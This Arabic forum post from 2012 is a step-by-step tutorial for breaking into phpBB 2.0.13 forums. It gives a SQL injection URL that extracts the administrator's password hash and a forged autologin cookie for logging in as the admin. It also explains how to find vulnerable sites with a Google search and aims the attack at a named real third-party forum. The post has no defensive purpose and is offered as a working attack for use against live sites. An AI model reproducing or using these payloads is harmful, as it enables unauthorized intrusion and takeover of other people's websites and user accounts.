المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اختراق منتديات


مجموعة المهاجرين
07-24-2012, 08:18 PM
السلام عليكم ورحمة الله وبركاته

هذي طريقة لاختراق منتدى PhpBB 2.0.13 الاصدار الأخير حتى الآن

الكود اللي بنحتاجه هو



كود




كود:

cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=2


ملاحظة: في مسافة بنص الكود طبعا انت عليك تمسح هذي المسافه وتشبكهم ببعض

الأدوات المستخدمة:
1- متصفح الأوبرا ( ملاحظة: أنا استخدمت المتصفح هذا بسبب وجود أداة سهلة لتعديل الكوكيز ولا تقدر تستخدم أي متصفح ثاني لتعديل الكوكيز )


طريقة العمل:
1- ادخل على google.com واكتب

Powered By Phpbb 2.0.13




2- بعد الضغط على Enter أو Google Search ستظهر لك المواقع كالتالي:




3- اختر أحد المواقع وطبق عليه الثغرة وأنا اخترت هذا الموقع اللي بيكون حقل تجارب

http://www.gruntsmilitary.com/forum (http://www.gruntsmilitary.com/forum)



4- سجل بالمنتدى وقم بتسجيل الدخول



5- قم بإضافة الكود التالي


كود:

كود PHP:




كود:

cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=2

ملاحظة: الكود بدون الفراغ اللي بالنص

وسيصبح شكل العنوان كالتالي:

http://www.gruntsmilitary.com/forum...ere%20user_id=2 (http://www.gruntsmilitary.com/forum...ere%20user_id=2)

6- اضغط Enter وسيظهر لك الباسورد المشفر كما في الصورة



7- ضع الباسورد المشفر داخل الكود التالي وسنسميه كود الكوكي


كود:

كود PHP:




كود:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 22XXX%22%3Bs%3B6%3A%22userid%22%3Bi%3A2%3B%7D


ملاحظة: الكود بدون الفراغ اللي بالنص يعني امسح الفراغ اول وبعدين حط فيه الباسورد المشفر

مع ملاحظة استبدال XXX بالباسورد المشفر

8- اختر Tools > Preferences



9- اختر من قائمة Privacy > Manage ******s



10- اضغط على الموقع وسيظهر لك سطرين إمسح السفلي بالضغط عليه مره ثم الضغط على مفتاح Delete



11- قم بالضغط دبل كلك بالماوس على الآخر الذي لم نمسحه ثم قم بمسح قيمة الكوكي وضع كود الكوكي الذي عملناه في الخطوة 7



12- اضغط OK ثم close ثم OK

13- اغلق متصفح الأوبرا ثم افتحه مرة أخرى وأكرر افتح نفس المتصفح لاتروح تفتح الاكسبلورر واكتب عنوان الموقع اللي هو

http://www.gruntsmilitary.com/forum (http://www.gruntsmilitary.com/forum)

14- مبروك عليك دخلت باسم المشرف الآن



15- للدخول للوحة التحكم اذهب لأسفل المنتدى واضغط Go to Administration Panel

والرابط هو http://www.gruntsmilitary.com/forum/admin (http://www.gruntsmilitary.com/forum/admin)

16- مبروك عليك لوحة التحكم وآخر شي يد علي يد نحمي الاسلام من الاعدء